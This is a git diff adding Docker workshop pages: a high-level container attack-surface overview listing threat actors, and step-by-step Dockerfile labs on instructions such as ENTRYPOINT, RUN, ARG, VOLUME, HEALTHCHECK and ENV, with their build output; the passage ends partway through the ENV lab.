CheatSheet](https://blog.cloudnativefolks.org/the-ultimate-docker-cheatsheet-for-everyone#heading-docker-compose) \ No newline at end of file diff --git a/content/en/containersecurity/b9.attack-surface 2.md b/content/en/containersecurity/b9.attack-surface 2.md new file mode 100644 index 0000000..2853cb4 --- /dev/null +++ b/content/en/containersecurity/b9.attack-surface 2.md @@ -0,0 +1,32 @@ +--- +title: "Attack surface of the container ecosystem " +slug: "Attack-surface-of-the-container-ecosystem" +--- + +## Container Technology Archiecture + +1. Developer systems (generate images and send them to testing and accreditation) +2. 
Testing and accreditation systems (validate and verify the contents of images, sign +images, and send images to the registry) +3. Registries (store images and distribute images to the orchestrator upon request) +4. Orchestrators (convert images into containers and deploy containers to hosts) +5. Hosts (run and stop containers as directed by the orchestrator) + + +![](./images/container-technology-arch.png) + + +## Attack surface of the container ecosystem + +![](./images/Container-Threat-model.png) + + + +One way to start thinking about the threat model is to consider the actors involved. These might include: + +1. External attackers attempting to access a deployment from outside +2. Internal attackers who have managed to access some part of the deployment +3. Malicious internal actors such as developers and administrators who have some level of privilege to access the deployment +3. Inadvertent internal actors who may accidentally cause problems +4. Application processes that, while not sentient beings intending to compromise +your system, might have programmatic access to the system \ No newline at end of file diff --git a/content/en/docker/_overview 2.md b/content/en/docker/_overview 2.md new file mode 100644 index 0000000..b3eda9a --- /dev/null +++ b/content/en/docker/_overview 2.md @@ -0,0 +1,74 @@ +--- +title: Overview +url: "docker/overview" +aliases: +- "/docker" +--- + + +### Table of Content +| Title | Link | +| --------- | ------- | +|1.Pre-requisit for this lab | [Lab](https://kubedaily.com/docker/pre-requisit-for-this-lab/) | +|2.Docker Hello World Example | [Lab](https://kubedaily.com/docker/docker-hello-world-example/) | +|3.Docker Image Filtering | | [Lab](https://kubedaily.com/docker/docker-image-filtering/) | +|4.Images and Container As Tar file | [Lab](https://kubedaily.com/docker/images-and-container-as-tar-file/) | +|5.Push first Nginx Web app To DockerHub | [Lab](https://kubedaily.com/docker/push-first-nginx-web-app-to-dockerhub/) | +|6.Build a Base Image from Scratch | [Lab](https://kubedaily.com/docker/build-a-base-image-from-scratch/) | +|7.Dockerfile Lab - ADD instruction | [Lab](https://kubedaily.com/docker/dockerfile-lab-add-instruction/) | +|8.Dockerfile Lab - COPY instruction | [Lab](https://kubedaily.com/docs/copy-instruction/) | +|9.Dockerfile Lab - CMD instruction | [Lab](https://kubedaily.com/docs/cmd-instruction/) | +|10.Dockerfile Lab - Entrypoint instruction | [Lab](https://kubedaily.com/docs/entrypoint-instruction/) | +|11.Dockerfile Lab - WORKDIR instruction | [Lab](https://kubedaily.com/docs/workdir-instruction/) | +|12.Dockerfile Lab - RUN instruction | [Lab](https://kubedaily.com/docs/run-instruction/) | +|13.Dockerfile Lab - ARG instruction | [Lab](https://kubedaily.com/docs/arg-instruction/) | +|14.Dockerfile Lab - Volume instruction | [Lab](https://kubedaily.com/docs/arg-instruction/) | +|15.Dockerfile Lab - USER instruction | [Lab](https://kubedaily.com/docs/user-instruction/) | +|16.Dockerfile Lab - HEALTHCHECK instruction | [Lab](https://kubedaily.com/docs/healthcheck-instruction/) | +|17.Dockerfile Lab - ENV instruction | [Lab](https://kubedaily.com/docs/env-instruction/) | +|18.Dockerfile Lab - ONBUILD instruction | [Lab](https://kubedaily.com/docs/onbuild-instruction/)| +|19.Running multiple docker containers from CLI | [Lab](https://kubedaily.com/docs/multiple-container/) | +|20.Write First Docker Compose file | [Lab](https://kubedaily.com/docs/write-first-docker_compose/) | +|21.Docker Compose with Volume Mount | 
[Lab](https://kubedaily.com/docs/docker-compose-volumes/) | +|22.Build Own Dockerfile and Docker Compose with Custom configuration| [Lab](https://kubedaily.com/docs/custom-docker-compose/) | +|23.Simple php apache and database using docker compose| [Lab](https://kubedaily.com/docs/php-database-docker-compose/) | +|24.Host Volume Mount - Data persistentence| [Lab](https://kubedaily.com/docs/host-volume-mount/) | +|25.Named Volume Mount - Data persistentence| [Lab](https://kubedaily.com/docs/name-volume-mount/) | +|26.Docker Compose CLI - Build Command| [Lab](https://kubedaily.com/docs/docker-compose-build/) | +|27.Docker Compose CLI - Config Command| [Lab](https://kubedaily.com/docs/docker-compose-config/) | +|28.Docker Compose CLI - CP Command| [Lab](https://kubedaily.com/docs/docker-compose-cp/) | +|29.Docker Compose CLI - Create Command| [Lab](https://kubedaily.com/docs/docker-compose-create/) | +|30.Docker Compose CLI - Down Command| [Lab](https://kubedaily.com/docs/docker-compose-down/) | +|31.Docker Compose CLI - Events Command| [Lab](https://kubedaily.com/docs/docker-compose-events/) | +|32.Docker Compose CLI - Exec Command| [Lab](https://kubedaily.com/docs/docker-compose-exec/) | +|33.Docker Compose CLI - Images Command| [Lab](https://kubedaily.com/docs/docker-compose-images/) | +|34.Docker Compose CLI - Kill Command| [Lab](https://kubedaily.com/docs/docker-compose-kill/) | +|35.Docker Compose CLI - logs Command| [Lab](https://kubedaily.com/docs/docker-compose-logs/) | +|36.Docker Compose CLI - ls Command| [Lab](https://kubedaily.com/docs/docker-compose-ls/) | +|37.Docker Compose CLI - Pause/unpause Command| [Lab](https://kubedaily.com/docs/docker-compose-pause/) | +|38.Docker Compose CLI - Port Command| [Lab](https://kubedaily.com/docs/docker-compose-port/) | +|39.Docker Compose CLI - ps Command| [Lab](https://kubedaily.com/docs/docker-compose-port/) | +|40.Docker Compose CLI - pull Command| [Lab](https://kubedaily.com/docs/docker-compose-pull/) | +|41.Docker Compose CLI - push Command| [Lab](https://kubedaily.com/docs/docker-compose-push/) | +|42.Docker Compose CLI - restart Command| [Lab](https://kubedaily.com/docs/docker-compose-restart/)| +|43.Docker Compose CLI - rm Command| [Lab](https://kubedaily.com/docs/docker-compose-rm/) | +|44.Docker Compose CLI - run Command| [Lab](https://kubedaily.com/docs/docker-compose-run/) | +|45.Setup local network| [Lab](https://kubedaily.com/docs/local-network/) | +|46.Setup Remote network| [Lab](https://kubedaily.com/docs/remote-network/) | +|48.Newtorking in Docker Compose| [Lab](https://kubedaily.com/docs/docker-compose-net/) | +|49.Newtorking in Docker Compose with ngnix| [Lab](https://kubedaily.com/docs/docker-compose-ngnix-net/) | +|50.Docker Wordpress Example| [Lab](https://kubedaily.com/docs/docker-wordpress/) | + +Todo List + +51. +52. +53. + + + + + +What next +- [Container Security Track](https://kubedaily.com/docs/0.0.1/container-security/) +- [Kubernetes Workshop Track](https://kubedaily.com/docs/0.0.1/k8s/) diff --git a/content/en/docker/a1.pre-requist 2.md b/content/en/docker/a1.pre-requist 2.md new file mode 100644 index 0000000..4a329ac --- /dev/null +++ b/content/en/docker/a1.pre-requist 2.md @@ -0,0 +1,25 @@ +--- +title: "Pre-requisit for this lab" +slug: Pre-requisit-for-this-lab +--- + + + +> Here are the steps to create a Docker Hub account: + +1. Go to https://hub.docker.com/signup and click on the "Sign Up" button. +
+2. Fill out the registration form with your name, email address, and password. +
+3. Agree to the terms of service and privacy policy by checking the box. +
+4. Click on the "Sign Up" button to complete the registration process. +
+5. You will receive a verification email from Docker Hub. Follow the link in the email to verify your email address. +
+ +6. Once your email address is verified, you can log in to Docker Hub using your email address and password. +
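A quick way to confirm the new account works from the CLI is to log in with `docker login`. The sketch below is optional and uses a placeholder for the username you chose at sign-up:

```sh
# Log in to Docker Hub from the terminal (you will be prompted for the password)
docker login -u <your-dockerhub-username>

# On success Docker prints "Login Succeeded"; you can then push images, e.g.
# (hypothetical repository name):
#   docker push <your-dockerhub-username>/my-first-image:latest
```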
+ +You can now create and manage your repositories, and upload your Docker images to share with the community. +That's it! You now have a Docker Hub account and you can start using it to store, share, and distribute your Docker images. \ No newline at end of file diff --git a/content/en/docker/a10.Entrypoint-instruction 2.md b/content/en/docker/a10.Entrypoint-instruction 2.md new file mode 100644 index 0000000..6de2869 --- /dev/null +++ b/content/en/docker/a10.Entrypoint-instruction 2.md @@ -0,0 +1,62 @@ +--- +title: "Dockerfile Lab - Entrypoint instruction " +description: "Dockerfile Lab 4 " +slug: "Dockerfile-Lab-Entrypoint-instruction" +--- + +#### Running a Docker Container with ENTRYPOINT + +Let's learn the details in this case by actually executing ENTRYPOINT in exec form. The following is an example of a Dockerfile that uses the exec form of ENTRYPOINT, which outputs a character string on the command line. + +```dockerfile +FROM alpine +ENTRYPOINT ["echo", "Hello!"] + +``` + +#### Build dockerfile + +```sh +➜ Dockerfile git:(main) βœ— docker build -t sangam14/entrypoint-dockerfile -f dockerfile.entrypoint . +[+] Building 3.2s (6/6) FINISHED + => [internal] load build definition from dockerfile.entrypoint 0.0s + => => transferring dockerfile: 94B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/library/alpine:latest 3.1s + => [auth] library/alpine:pull token for registry-1.docker.io 0.0s + => [1/1] FROM docker.io/library/alpine@sha256:69665d02cb32192e52e07644d76bc6f25abeb5410edc1c7a81a10ba3f0efb90a 0.0s + => => resolve docker.io/library/alpine@sha256:69665d02cb32192e52e07644d76bc6f25abeb5410edc1c7a81a10ba3f0efb90a 0.0s + => => sha256:69665d02cb32192e52e07644d76bc6f25abeb5410edc1c7a81a10ba3f0efb90a 1.64kB / 1.64kB 0.0s + => => sha256:c41ab5c992deb4fe7e5da09f67a8804a46bd0592bfdf0b1847dde0e0889d2bff 528B / 528B 0.0s + => => sha256:d74e625d91152966d38fe8a62c60daadb96d4b94c1a366de01fab5f334806239 1.49kB / 1.49kB 0.0s + => exporting to image 0.0s + => => exporting layers 0.0s + => => writing image sha256:0d5a798a648339f8ea8094b10568eb2dc44540480deff55f680dfd689f787013 0.0s + => => naming to docker.io/sangam14/entrypoint-dockerfile 0.0s + ``` + +#### run docker container + +```sh + Dockerfile git:(main) βœ— docker run sangam14/entrypoint-dockerfile +Hello! +➜ Dockerfile git:(main) βœ— docker run sangam14/entrypoint-dockerfile echo "sangam" +Hello! echo sangam +➜ Dockerfile git:(main) βœ— + +``` + +#### Overwrite with `--entrypoint` option + +On the other hand, in ENTRYPOINT, you can change the instruction by using the option of `β€”entrypoint` as follows. + +```sh +docker run --rm --entrypoint sh sangam14/entrypoint-dockerfile -c 'echo "test"' +test + +``` + +CMD and ENTRYPOINT have similar roles and are confusing, but they have different functions. CMD, ENTRYPOINT, and ENTRYPOINT also behave differently between shell form and exec form, so it's a good idea to use each function properly. The instructions in the Dockerfile are a bit complicated, but you can use them effectively if you understand them. 
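To make the CMD/ENTRYPOINT difference concrete, here is a short recap using the `sangam14/entrypoint-dockerfile` image built above; the handling of the extra arguments is the point to notice:

```sh
# With ENTRYPOINT ["echo", "Hello!"], extra arguments are appended to the
# entrypoint instead of replacing it:
docker run --rm sangam14/entrypoint-dockerfile            # prints: Hello!
docker run --rm sangam14/entrypoint-dockerfile from CMD   # prints: Hello! from CMD

# With a CMD-only image the same trailing arguments would replace CMD entirely,
# so the original command would not run at all.
```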
+ + diff --git a/content/en/docker/a11.WORKDIR-instruction 2.md b/content/en/docker/a11.WORKDIR-instruction 2.md new file mode 100644 index 0000000..80f3131 --- /dev/null +++ b/content/en/docker/a11.WORKDIR-instruction 2.md @@ -0,0 +1,34 @@ +--- +title: "Dockerfile Lab - WORKDIR instruction " +description: " Dockerfile Lab 5 " +slug: "Dockerfile-Lab-WORKDIR-instruction" +--- + +The WORKDIR command is used to define the working directory of a Docker container at any given time. The command is specified in the Dockerfile. + +Any RUN, CMD, ADD, COPY, or ENTRYPOINT command will be executed in the specified working directory. + +# WORKDIR instruction Dockerfile for Docker Quick Start + +```Dockerfile +FROM ubuntu +WORKDIR /var/www/html +RUN apt-get update && apt-get install -y nginx +COPY index.html . +ENTRYPOINT ["nginx", "-g", "daemon off;"] +``` +#### build dockerfile + +```sh +docker build -t sangam14/workdir-dockerfile -f dockerfile.workdir . + +``` +#### run docker container + +```sh +docker run -p 80:80 sangam14/workdir-dockerfile + +``` +output + +![](./images/ngnix.png) diff --git a/content/en/docker/a12.RUN-instruction 2.md b/content/en/docker/a12.RUN-instruction 2.md new file mode 100644 index 0000000..1224b81 --- /dev/null +++ b/content/en/docker/a12.RUN-instruction 2.md @@ -0,0 +1,58 @@ +--- +title: "Dockerfile Lab - RUN instruction " +slug: "Dockerfile-Lab-RUN-instruction" +--- + +The RUN command is the central executing directive for Dockerfiles. It takes a command as its argument and runs it to form the image. Unlike CMD, it actually is used to build the image (forming another layer on top of the previous one which is committed). + + +#### create dockerfile with following content + +```dockerfile +FROM ubuntu +RUN id +RUN useradd --create-home -m -s /bin/bash dev +# Add a fun prompt for dev user of my-app +# whale: "\xF0\x9F\x90\xB3" +# alien:"\xF0\x9F\x91\xBD" +# fish:"\xF0\x9F\x90\xA0" +# elephant:"\xF0\x9F\x91\xBD" +# moneybag:"\xF0\x9F\x92\xB0" +RUN echo 'PS1="\[$(tput bold)$(tput setaf 4)\]my-app $(echo -e "\xF0\x9F\x90\xB3") \[$(tput sgr0)\] [\\u@\\h]:\\W \\$ "' >> /home/dev/.bashrc && \ + echo 'alias ls="ls --color=auto"' >> /home/dev/.bashrc + +RUN mkdir /myvol +RUN echo "hello DQS Guide" > /myvol/greeting +RUN ["chmod", "664", "/myvol/greeting"] +RUN ["chown", "dev:dev", "/myvol/greeting"] +VOLUME /myvol + +USER dev +RUN id + +CMD ["/bin/bash"] + +``` + +### build docker container + +```bash + ➜ docker build -t sangam14/run-dockerfile -f dockerfile.run . 
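# (optional) a quick way to see the layer that each RUN instruction committed;
# the tag matches the build command above
docker history sangam14/run-dockerfile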
+``` + + +#### run docer container + +```sh +➜ Dockerfile git:(main) βœ— docker run -it sangam14/run-dockerfile +``` +#### added user as my-app with whale emoji + +```sh +my-app 🐳 [dev@0270ab5e6f0c]:/ $ ls +bin boot dev etc home lib media mnt myvol opt proc root run sbin srv sys tmp usr var +my-app 🐳 [dev@0270ab5e6f0c]:/ $ cat myvol/greeting +hello DQS Guide + +``` + diff --git a/content/en/docker/a13.ARG-instruction 2.md b/content/en/docker/a13.ARG-instruction 2.md new file mode 100644 index 0000000..0fdaa93 --- /dev/null +++ b/content/en/docker/a13.ARG-instruction 2.md @@ -0,0 +1,184 @@ +--- +title: "Dockerfile Lab - ARG instruction" +slug: "Dockerfile-Lab-ARG-instruction" +--- + + +```dockerfile +FROM alpine + +ENV key1="ENV is stronger than an ARG" +RUN echo ${key1} +ARG key1="not going to matter" +RUN echo ${key1} + +RUN echo ${key2} +ARG key2="defaultValue" +RUN echo ${key2} +ENV key2="ENV value takes over" +RUN echo ${key2} +CMD ["sh"] +``` + +#### Build Dockerfile + +```sh + Dockerfile git:(main) βœ— docker build -t sangam14/arg-dockerfile -f dockerfile.arg . +[+] Building 3.5s (11/11) FINISHED + => [internal] load build definition from dockerfile.arg 0.0s + => => transferring dockerfile: 336B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/library/alpine:latest 2.2s + => [auth] library/alpine:pull token for registry-1.docker.io 0.0s + => CACHED [1/6] FROM docker.io/library/alpine@sha256:69665d02cb32192e52e07644d76bc6f25abeb5410edc1c7a81a10ba3f0efb90a 0.0s + => [2/6] RUN echo ENV is stronger than an ARG 0.2s + => [3/6] RUN echo not going to matter 0.1s + => [4/6] RUN echo ${key2} 0.3s + => [5/6] RUN echo defaultValue 0.2s + => [6/6] RUN echo ENV value takes over 0.3s + => exporting to image 0.0s + => => exporting layers 0.0s + => => writing image sha256:acf55f3ef13e44ff24acf18f9c6320e5af33aa3eb9789274a46f47a9dff6d474 0.0s + => => naming to docker.io/sangam14/arg-dockerfile + + ``` + +#### Inspect Env variable + +```sh +docker image inspect --format '{{json .Config}}' sangam14/arg-demo:1.0 | jq '.Env' + +``` + +output + +```sh +docker image inspect --format '{{json .Config}}' sangam14/arg-dockerfile | jq '.Env' +[ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", + "key1=ENV is stronger than an ARG", + "key2=ENV value takes over" +] +``` +docker container run sangam14/arg-dockerfile env + +```sh +docker container run sangam14/arg-dockerfile env +PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin +HOSTNAME=7b09d8fffd50 +key1=ENV is stronger than an ARG +key2=ENV value takes over +HOME=/root + +``` +#### Pass env values while building dockerfile + +```sh +docker build --rm --build-arg key1="buildTimeValue" --build-arg key2="good till env instruction" --tag sangam14/arg-dockerfile1 -f dockerfile.arg . 
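# Note: the two --build-arg flags above only override the ARG defaults; the ENV
# instructions in the Dockerfile still take precedence, which is what the build
# output below shows (key1 keeps its ENV value; key2 shows the build-arg value
# only until the ENV instruction for key2 is reached).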
+Sending build context to Docker daemon 50.18kB +Step 1/11 : FROM alpine +latest: Pulling from library/alpine +af6eaf76a39c: Already exists +Digest: sha256:69665d02cb32192e52e07644d76bc6f25abeb5410edc1c7a81a10ba3f0efb90a +Status: Downloaded newer image for alpine:latest + ---> d74e625d9115 +Step 2/11 : ENV key1="ENV is stronger than an ARG" + ---> Running in 93620e2ca3e2 +Removing intermediate container 93620e2ca3e2 + ---> e5eaad1dfbfa +Step 3/11 : RUN echo ${key1} + ---> Running in bf14143efff7 +ENV is stronger than an ARG +Removing intermediate container bf14143efff7 + ---> 2936757fac41 +Step 4/11 : ARG key1="not going to matter" + ---> Running in 161bf9d911e7 +Removing intermediate container 161bf9d911e7 + ---> 87ff1f1e4c1b +Step 5/11 : RUN echo ${key1} + ---> Running in 2e69ff7a2d91 +ENV is stronger than an ARG +Removing intermediate container 2e69ff7a2d91 + ---> af66f1b039df +Step 6/11 : RUN echo ${key2} + ---> Running in 5dd29054ba99 + +Removing intermediate container 5dd29054ba99 + ---> f575cd74046a +Step 7/11 : ARG key2="defaultValue" + ---> Running in 757002f257f0 +Removing intermediate container 757002f257f0 + ---> d60933ac5ef5 +Step 8/11 : RUN echo ${key2} + ---> Running in 742bdd38d1e0 +good till env instruction +Removing intermediate container 742bdd38d1e0 + ---> b32166e66170 +Step 9/11 : ENV key2="ENV value takes over" + ---> Running in 1bedb017ed72 +Removing intermediate container 1bedb017ed72 + ---> c8a4d9a2fd20 +Step 10/11 : RUN echo ${key2} + ---> Running in 96dbe6d53412 +ENV value takes over +Removing intermediate container 96dbe6d53412 + ---> 6270d392443c +Step 11/11 : CMD ["sh"] + ---> Running in b13a9ae5798f +Removing intermediate container b13a9ae5798f + ---> 9f878f6fe503 +Successfully built 9f878f6fe503 +Successfully tagged sangam14/arg-dockerfile1:latest +``` + +#### Inspect Env of new docker image + +```sh +docker image inspect --format '{{json .Config}}' sangam14/arg-dockerfile1:latest | jq '.Env' +[ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", + "key1=ENV is stronger than an ARG", + "key2=ENV value takes over" +] +``` + +```sh +docker container run sangam14/arg-dockerfile1 env +PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin +HOSTNAME=dff7e104aadb +key1=ENV is stronger than an ARG +key2=ENV value takes over +HOME=/root + +``` + + +cat dockerfile.arg1 + +```Dockerfile + +FROM alpine + +ENV lifecycle="production" +RUN echo ${lifecycle} +ARG username="35" +RUN echo ${username} +ARG appdir +RUN echo ${appdir} + +ADD hello /${appdir}/ +RUN chown -R ${username}:${username} ${appdir} +WORKDIR ${appdir} +USER ${username} + +CMD ["./hello"] + +``` + +#### build docker image and pass build args + +```sh +docker build --build-arg username=35 --build-arg appdir="/opt/hello" -t sangam14/arg1-dockerfile -f dockerfile.arg1 . +``` + diff --git a/content/en/docker/a14.Volume-Instruction 2.md b/content/en/docker/a14.Volume-Instruction 2.md new file mode 100644 index 0000000..c84f564 --- /dev/null +++ b/content/en/docker/a14.Volume-Instruction 2.md @@ -0,0 +1,130 @@ +--- +title: "Dockerfile Lab - Volume instruction" +slug: "Dockerfile-Lab-Volume-instruction" +--- + + +cat dockerfile.vol + +```Dockerfile +FROM alpine +RUN mkdir /myvol +RUN echo "hello world" > /myvol/greeting +VOLUME /myvol +CMD ["sh"] + +``` + +#### Build above dockerfile + +```sh +docker build -t sangam14/vol-dockerfile -f dockerfile.vol . 
+[+] Building 0.4s (7/7) FINISHED + => [internal] load build definition from dockerfile.vol 0.0s + => => transferring dockerfile: 140B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/library/alpine:latest 0.0s + => CACHED [1/3] FROM docker.io/library/alpine 0.0s + => [2/3] RUN mkdir /myvol 0.2s + => [3/3] RUN echo "hello world" > /myvol/greeting 0.2s + => exporting to image 0.0s + => => exporting layers 0.0s + => => writing image sha256:7d9ebad9eb42a7006dbb89c1a544e5fcbce3de83cb470210b89adf4ffc4670db 0.0s + => => naming to docker.io/sangam14/vol-dockerfile 0.0s +``` + +#### run dockerg + +```sh +docker run --rm -it --mount source=myvolsrc,target=/myvol sangam14/vol-dockerfile +``` + +output + +```sh +docker run --rm -it --mount source=myvolsrc,target=/myvol sangam14/vol-dockerfile +/ # ls +bin dev etc home lib media mnt myvol opt proc root run sbin srv sys tmp usr var +/ # cat myvol/greeting +hello world + +``` +#### check it out all mounted volumes + +```sh +docker volume ls + +``` +output + +```sh +Dockerfile git:(main) βœ— docker volume ls +DRIVER VOLUME NAME +local myvolsrc + +``` + +#### run container + +```sh +docker run --rm -d --name vol-demo sangam14/vol-dockerfile tail -f /dev/null +76a5bfedc0a43bde7f2788fec5e5aafaa94854f16f960ed736ba598b80560f8d + +``` + +```sh +docker ps +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +76a5bfedc0a4 sangam14/vol-dockerfile "tail -f /dev/null" About a minute ago Up About a minute vol-demo +``` +#### stop running container + +```sh +docker container stop vol-demo +vol-demo + +``` + +#### lets run container + +```sh +docker run -d --name vol-demo --mount source=myvolsrc,target=/myvol sangam14/vol-dockerfile tail -f /dev/null +``` +#### exec into running container + +```sh + Dockerfile git:(main) βœ— docker container exec vol-demo ls -l /myvol +total 4 +-rw-r--r-- 1 root root 12 Mar 2 19:47 greeting + +``` +#### check it out mount point using docker inspect + +```sh + +docker volume inspect myvolsrc -f "{{.Mountpoint}}" +``` + +#### stop running container + +```sh +docker container stop vol-demo +``` +#### remove container + +```sh +docker container rm vol-demo + +``` +#### remove volume + +```sh +docker volume rm myvolsrc +``` +#### verify once + +```sh +docker volume ls +docker container ls +``` diff --git a/content/en/docker/a15.User-Instruction 2.md b/content/en/docker/a15.User-Instruction 2.md new file mode 100644 index 0000000..e3aec66 --- /dev/null +++ b/content/en/docker/a15.User-Instruction 2.md @@ -0,0 +1,49 @@ +--- +title: "Dockerfile Lab - USER instruction" +slug: "Dockerfile-Lab-USER-instruction" +--- + + +cat dockerfile.user + +```Dockerfile +FROM alpine +USER dockerworkshop:dockerworkshop +CMD ["sh"] + +``` + +#### build dockerfile + +```sh +docker build -t sangam14/user-dockerfile -f dockerfile.user . 
+[+] Building 0.1s (5/5) FINISHED + => [internal] load build definition from dockerfile.user 0.0s + => => transferring dockerfile: 105B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/library/alpine:latest 0.0s + => CACHED [1/1] FROM docker.io/library/alpine 0.0s + => exporting to image 0.0s + => => exporting layers 0.0s + => => writing image sha256:48482459d09aecafaa0db190d6995b6d2339c0383c6cd97fafbea288124332c7 0.0s + => => naming to docker.io/sangam14/user-dockerfile + +``` + +#### run docker container in detach mode + +```sh +docker container run -d sangam14/user-dockerfile +5880a92a14d3944a4be00a19d55a19dd941f0c1b9a7a7b9159febcc29a09ea98 + +``` + +If we check the owner of the sleep process on the host, we can see it belongs to the user with uid 1000, the one that is created in the image + + +```sh +ps aux | grep sleep +sangambiradar 22103 0.0 0.0 408111776 1168 s000 S+ 2:03AM 0:00.00 grep --color=auto --exclude-dir=.bzr --exclude-dir=CVS --exclude-dir=.git --exclude-dir=.hg --exclude-dir=.svn --exclude-dir=.idea --exclude-dir=.tox sleep + +``` diff --git a/content/en/docker/a16.HEALTHCHECK-instruction 2.md b/content/en/docker/a16.HEALTHCHECK-instruction 2.md new file mode 100644 index 0000000..5dd68a9 --- /dev/null +++ b/content/en/docker/a16.HEALTHCHECK-instruction 2.md @@ -0,0 +1,84 @@ +--- +title: "Dockerfile Lab - HEALTHCHECK instruction" +slug: "Dockerfile-Lab-HEALTHCHECK-instruction" +--- + + +cat Dockerfile + +```sh +FROM nginx + +``` + +#### build docker container + +```sh +docker build -t sangam14/healthcheck-dockerfile -f dockerfile.healthcheck . +[+] Building 1.4s (6/6) FINISHED + => [internal] load build definition from dockerfile.healthcheck 0.0s + => => transferring dockerfile: 244B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/library/alpine:latest 0.0s + => CACHED [1/2] FROM docker.io/library/alpine 0.0s + => [2/2] RUN apk add curl 1.3s + => exporting to image 0.0s + => => exporting layers 0.0s + => => writing image sha256:2486b7b700a94a3e91237b3b8720f2b36c6e5e6b90584638db8c328a78dd90f9 0.0s + => => naming to docker.io/sangam14/healthcheck-dockerfile 0.0s +➜ Dockerfile git:(main) βœ— +``` + +### expose docker port on 80 port + +```sh +➜ Dockerfile git:(main) βœ— docker container run --rm -d -p 80:80 --name health sangam14/healthcheck-dockerfile +408e0d86098c4136dd36c7abf51ce4c6eb495d5fd33056f2b9e9a1176434853e +``` + +```sh +FROM nginx +RUN apt-get update && apt-get install -y curl && rm -rf /var/lib/apt/lists/* +HEALTHCHECK --interval=5s --timeout=3s \ + CMD curl -fs http://localhost/ || exit 1 +``` + + +### build dockerfile + +```sh + Dockerfile git:(main) βœ— docker build -t sangam14/healthcheck-dockerfile -f dockerfile.healthcheck . 
+[+] Building 2.7s (6/6) FINISHED + => [internal] load build definition from dockerfile.healthcheck 0.0s + => => transferring dockerfile: 227B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/library/nginx:latest 0.0s + => CACHED [1/2] FROM docker.io/library/nginx 0.0s + => [2/2] RUN apt-get update && apt-get install -y curl && rm -rf /var/lib/apt/lists/* 2.6s + => exporting to image 0.0s + => => exporting layers 0.0s + => => writing image sha256:c3b3dc3b23772975869bb5dc0dda8d877bcc16e6b408b31938f3deb309f92da7 0.0s + => => naming to docker.io/sangam14/healthcheck-dockerfile 0.0s + + + +``` + +#### inspect healthcheck + +```sh + docker inspect --format '{{json .State.Health}}' health +{"Status":"healthy","FailingStreak":0,"Log":[{"Start":"2023-03-02T21:58:38.327900678Z","End":"2023-03-02T21:58:38.409811095Z","ExitCode":0,"Output":"\n\n\nWelcome to nginx!\n\n\n\n

Welcome to nginx!\nIf you see this page, the nginx web server is successfully installed and\nworking. Further configuration is required.\n\nFor online documentation and support please refer to\nnginx.org.\nCommercial support is available at\nnginx.com.\n\nThank you for using nginx.\n\n\n"},
{"Start":"2023-03-02T21:58:43.417592375Z","End":"2023-03-02T21:58:43.510278458Z","ExitCode":0,"Output":"\n\n\nWelcome to nginx!\n\n\n\nWelcome to nginx!\nIf you see this page, the nginx web server is successfully installed and\nworking. Further configuration is required.\n\nFor online documentation and support please refer to\nnginx.org.\nCommercial support is available at\nnginx.com.\n\nThank you for using nginx.\n\n\n"},
{"Start":"2023-03-02T21:58:48.514938961Z","End":"2023-03-02T21:58:48.601586961Z","ExitCode":0,"Output":"\n\n\nWelcome to nginx!\n\n\n\nWelcome to nginx!\nIf you see this page, the nginx web server is successfully installed and\nworking. Further configuration is required.\n\nFor online documentation and support please refer to\nnginx.org.\nCommercial support is available at\nnginx.com.\n\nThank you for using nginx.\n\n\n"},
{"Start":"2023-03-02T21:58:53.606320671Z","End":"2023-03-02T21:58:53.693584213Z","ExitCode":0,"Output":"\n\n\nWelcome to nginx!\n\n\n\nWelcome to nginx!\nIf you see this page, the nginx web server is successfully installed and\nworking. Further configuration is required.\n\nFor online documentation and support please refer to\nnginx.org.\nCommercial support is available at\nnginx.com.\n\nThank you for using nginx.\n\n\n"},
{"Start":"2023-03-02T21:58:58.697104757Z","End":"2023-03-02T21:58:58.780027924Z","ExitCode":0,"Output":"\n\n\nWelcome to nginx!\n\n\n\nWelcome to nginx!\nIf you see this page, the nginx web server is successfully installed and\nworking. Further configuration is required.\n\nFor online documentation and support please refer to\nnginx.org.\nCommercial support is available at\nnginx.com.\n\nThank you for using nginx.
\n\n\n"}]} + +``` + + +β˜… `--interval`: This specifies the period between each health check (the default is 30s). +
+β˜… `--timeout`: If no success response is received within this period, the health check is considered failed (the default is 30s). +
+β˜… `--start-period`: The duration to wait before running the first health check. This is used to give a startup time for the container (the default is 0s). +
+β˜… `--retries` : The container will be considered unhealthy if the health check failed consecutively for the given number of retries (the default is 3). \ No newline at end of file diff --git a/content/en/docker/a17.ENV-instruction 2.md b/content/en/docker/a17.ENV-instruction 2.md new file mode 100644 index 0000000..22b315f --- /dev/null +++ b/content/en/docker/a17.ENV-instruction 2.md @@ -0,0 +1,71 @@ +--- +title: "Dockerfile Lab - ENV instruction " +slug: "Dockerfile-Lab-ENV-instruction" +--- + + +cat dockerfile + +```dockerfile +FROM alpine +ENV appDescription This app is a sample of using ENV instructions +ENV appName=env-demo +ENV note1="The First Note First" note2=The\ Second\ Note\ Second \ + note3="The Third Note Third" +ENV changeMe="Old Value" +CMD ["sh"] + + +``` + +#### build dockerfile + +```sh + +➜ Dockerfile git:(main) βœ— docker build -t sangam14/env-dockerfile -f dockerfile.env . +[+] Building 0.1s (5/5) FINISHED + => [internal] load build definition from dockerfile.env 0.0s + => => transferring dockerfile: 279B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/library/alpine:latest 0.0s + => CACHED [1/1] FROM docker.io/library/alpine 0.0s + => exporting to 